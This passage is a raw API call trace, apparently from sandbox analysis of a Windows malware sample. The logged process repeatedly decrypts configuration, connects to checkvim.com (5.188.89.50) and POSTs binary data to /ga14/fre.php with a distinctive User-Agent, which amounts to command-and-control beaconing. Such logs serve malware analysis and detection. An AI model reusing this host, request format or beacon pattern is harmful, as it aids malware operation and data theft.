(lpLibFileName="ADVAPI32") returned 0x76a90000 [0230.721] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0230.721] GetProcessHeap () returned 0x840000 [0230.721] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0230.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0230.722] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0230.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0230.723] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0230.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0230.724] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0230.724] GetProcessHeap () returned 0x840000 [0230.724] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0230.724] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0230.726] GetProcessHeap () returned 0x840000 [0230.726] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0230.726] socket (af=2, type=1, protocol=6) returned 0x30c [0230.726] connect (s=0x30c, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0230.796] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0230.796] GetProcessHeap () returned 0x840000 [0230.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0230.796] GetProcessHeap () returned 0x840000 [0230.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0230.797] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0230.798] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0230.798] GetProcessHeap () returned 0x840000 [0230.798] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0230.798] GetProcessHeap () returned 0x840000 [0230.798] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0230.798] GetProcessHeap () returned 0x840000 [0230.798] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0230.798] GetProcessHeap () returned 0x840000 [0230.798] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0230.799] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0230.800] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0230.800] GetProcessHeap () returned 0x840000 [0230.800] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0230.800] GetProcessHeap () returned 0x840000 [0230.800] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0230.800] send (s=0x30c, buf=0x873a58*, len=237, flags=0) returned 237 [0230.802] send (s=0x30c, buf=0x87eb58*, len=159, flags=0) returned 159 [0230.802] GetProcessHeap () returned 0x840000 [0230.803] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0230.803] recv (in: s=0x30c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0231.173] GetProcessHeap () returned 0x840000 [0231.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0231.173] GetProcessHeap () returned 0x840000 [0231.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0231.173] GetProcessHeap () returned 0x840000 [0231.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0231.173] GetProcessHeap () returned 0x840000 [0231.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0231.173] closesocket (s=0x30c) returned 0 [0231.202] GetProcessHeap () returned 0x840000 [0231.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0231.202] GetProcessHeap () returned 0x840000 [0231.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0231.202] GetProcessHeap () returned 0x840000 [0231.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcf8 | out: hHeap=0x840000) returned 1 [0231.202] GetProcessHeap () returned 0x840000 [0231.202] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0231.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xe78) returned 0x30c [0231.318] Sleep (dwMilliseconds=0xea60) [0231.323] GetProcessHeap () returned 0x840000 [0231.323] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0231.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.324] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0231.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.364] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0231.374] GetProcessHeap () returned 0x840000 [0231.374] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0231.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.375] CryptImportKey (in: hProv=0x86f248, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0231.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.376] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0231.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.377] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.377] GetProcessHeap () returned 0x840000 [0231.377] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0231.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.378] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0231.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.384] CryptDestroyKey (hKey=0x87e270) returned 1 [0231.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.385] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0231.385] GetProcessHeap () returned 0x840000 [0231.385] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0231.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0231.386] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0231.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0231.390] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0231.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0231.391] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0231.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0231.392] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0231.392] GetProcessHeap () returned 0x840000 [0231.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0231.395] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0231.419] GetProcessHeap () returned 0x840000 [0231.419] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0231.419] GetProcessHeap () returned 0x840000 [0231.419] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0231.419] GetProcessHeap () returned 0x840000 [0231.419] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0231.419] GetProcessHeap () returned 0x840000 [0231.419] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0231.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.420] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0231.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.426] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0231.431] GetProcessHeap () returned 0x840000 [0231.431] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0231.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.432] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0231.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.433] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0231.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.434] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0231.434] GetProcessHeap () returned 0x840000 [0231.434] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0231.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.435] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0231.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.436] CryptDestroyKey (hKey=0x87e930) returned 1 [0231.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0231.437] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0231.437] GetProcessHeap () returned 0x840000 [0231.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0231.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0231.438] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0231.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0231.439] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0231.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0231.440] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0231.440] GetProcessHeap () returned 0x840000 [0231.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0231.440] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0231.443] GetProcessHeap () returned 0x840000 [0231.443] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0231.443] socket (af=2, type=1, protocol=6) returned 0x310 [0231.443] connect (s=0x310, name=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0231.511] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0231.511] GetProcessHeap () returned 0x840000 [0231.511] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0231.511] GetProcessHeap () returned 0x840000 [0231.511] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0231.512] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0231.513] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0231.513] GetProcessHeap () returned 0x840000 [0231.513] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0231.513] GetProcessHeap () returned 0x840000 [0231.513] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0231.513] GetProcessHeap () returned 0x840000 [0231.513] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0231.513] GetProcessHeap () returned 0x840000 [0231.513] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0231.514] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0231.515] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0231.515] GetProcessHeap () returned 0x840000 [0231.515] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0231.515] GetProcessHeap () returned 0x840000 [0231.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0231.515] send (s=0x310, buf=0x873a58*, len=237, flags=0) returned 237 [0231.516] send (s=0x310, buf=0x87eb58*, len=159, flags=0) returned 159 [0231.516] GetProcessHeap () returned 0x840000 [0231.516] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0231.516] recv (in: s=0x310, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0231.979] GetProcessHeap () returned 0x840000 [0231.979] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0231.979] GetProcessHeap () returned 0x840000 [0231.979] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0231.980] GetProcessHeap () returned 0x840000 [0231.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0231.980] GetProcessHeap () returned 0x840000 [0231.980] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0231.980] closesocket (s=0x310) returned 0 [0232.009] GetProcessHeap () returned 0x840000 [0232.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0232.010] GetProcessHeap () returned 0x840000 [0232.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0232.010] GetProcessHeap () returned 0x840000 [0232.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0232.010] GetProcessHeap () returned 0x840000 [0232.010] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0232.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x968) returned 0x310 [0232.012] Sleep (dwMilliseconds=0xea60) [0232.014] GetProcessHeap () returned 0x840000 [0232.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0232.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.015] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0232.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.034] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0232.041] GetProcessHeap () returned 0x840000 [0232.041] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0232.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.042] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0232.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.043] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0232.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.045] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.045] GetProcessHeap () returned 0x840000 [0232.045] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0232.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.046] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0232.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.047] CryptDestroyKey (hKey=0x87e670) returned 1 [0232.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.048] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0232.048] GetProcessHeap () returned 0x840000 [0232.048] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0232.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.049] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0232.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.050] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0232.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.053] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0232.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.053] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0232.053] GetProcessHeap () returned 0x840000 [0232.053] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0232.053] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0232.054] GetProcessHeap () returned 0x840000 [0232.054] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0232.054] GetProcessHeap () returned 0x840000 [0232.054] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0232.054] GetProcessHeap () returned 0x840000 [0232.054] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0232.054] GetProcessHeap () returned 0x840000 [0232.054] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0232.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.055] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0232.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.061] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0232.067] GetProcessHeap () returned 0x840000 [0232.067] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0232.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.068] CryptImportKey (in: hProv=0x86f710, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0232.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.069] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0232.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.070] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0232.070] GetProcessHeap () returned 0x840000 [0232.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0232.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.071] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0232.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.071] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0232.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0232.072] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0232.072] GetProcessHeap () returned 0x840000 [0232.072] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0232.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.073] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0232.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.074] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0232.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.075] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0232.075] GetProcessHeap () returned 0x840000 [0232.075] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0232.075] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0232.080] GetProcessHeap () returned 0x840000 [0232.081] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bf8 [0232.081] socket (af=2, type=1, protocol=6) returned 0x314 [0232.081] connect (s=0x314, name=0x878ba8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0232.150] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, 